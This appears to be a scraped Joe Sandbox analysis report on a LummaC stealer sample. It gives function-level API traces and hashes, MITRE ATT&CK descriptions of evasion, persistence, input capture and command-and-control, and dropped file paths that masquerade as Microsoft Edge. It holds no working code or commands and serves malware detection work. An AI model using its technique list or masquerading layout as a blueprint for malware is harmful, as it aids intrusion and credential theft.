Analysis Process: RegAsm.exePID: 7312, Parent PID: 7252COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.3%
Total number of Nodes:	49
Total number of Limit Nodes:	5

Executed Functions

Function 0040D3C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040D3D1
GetCurrentThreadId.KERNEL32 ref: 0040D3E6
GetCurrentProcessId.KERNEL32 ref: 0040D3EC
ExitProcess.KERNEL32 ref: 0040D5B0

Strings

ohij, xrefs: 0040D54E
clmn, xrefs: 0040D573, 0040D57B

Memory Dump Source

Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: clmn$ohij
API String ID: 1029096631-3567580053
Opcode ID: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
Instruction ID: 8f1940826fa5e4ef35febcdafd7184f7e4a9353c3ce711b8b38eacab782ab196
Opcode Fuzzy Hash: 4c653ea9ada5344bda0104f52dcfa29158eed8f8ae5aa501a9de71a42c93f49e
Instruction Fuzzy Hash: C841397480D380ABD701AF99D544A1EFBE1AF52709F548C2DE4C4A7392C73AD8588B6B

Function 00445294 Relevance: 1.6, APIs: 1, Instructions: 76
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 0044530C

Memory Dump Source

Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
Instruction ID: 32cf0169799236ea817639a585a2fb97fc7d0b73a9cb276cd4531836bf098fa6
Opcode Fuzzy Hash: a5ab4fafe27626d2c8abd12efacffb37336a606f183b878775e77db83958384e
Instruction Fuzzy Hash: 4031C375D04296AFDB00CFA8D8502ADFFB1BB15341F684459D440B7352C734AB15CFA9

Function 00443160 Relevance: 1.6, APIs: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(6A69686F,00000000,?), ref: 004431D3

Memory Dump Source

Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
Instruction ID: 154aceb0a70e2b1c6176248329647f15dfba9260395587bf241fc84468e2c486
Opcode Fuzzy Hash: b531817381292eac37c55a32594c5c078c22521a7b44cc151e322e869f1473ef
Instruction Fuzzy Hash: E501693050C250DBD301AF18E958A0ABBF4EF4AB02F454C68E4C49B362D33ADD24CB9A

Function 00446176 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f850fbe3fdc24067df6dafc041743f2187b66143897b2b19b35a92ba6be7cc95
Instruction ID: c80be1933921a698e0c592e0b6ed05ef8870e218a02cae1fee4b14558d0fb82e
Opcode Fuzzy Hash: f850fbe3fdc24067df6dafc041743f2187b66143897b2b19b35a92ba6be7cc95
Instruction Fuzzy Hash: A5012431A00221DBDB058F94EC84AAFBB74FF47701F050866E811EB253D739C510CB6A

Function 00443142 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00443148

Memory Dump Source

Source File: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
Instruction ID: f2ee8ec3101e335420bd073388b79e1bdf2823782e18275de44ef30affdbbf4e
Opcode Fuzzy Hash: 1d7f40c18e52b896ede2ec4de930e2bbf0d7d1e9d6beaefe7b6dc95e471b35e6
Instruction Fuzzy Hash: 3CB012300401209BC5141B05FC09F823F209F40661F110060F004480F2C15189A5C5E8

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NCTSgL4t0B.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Edge\61a52ddc9dd915

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

C:\Edge\msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Users\user\AppData\Local\6ccacd8608530f

C:\Users\user\AppData\Local\Idle.exe

Windows Analysis Report
NCTSgL4t0B.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre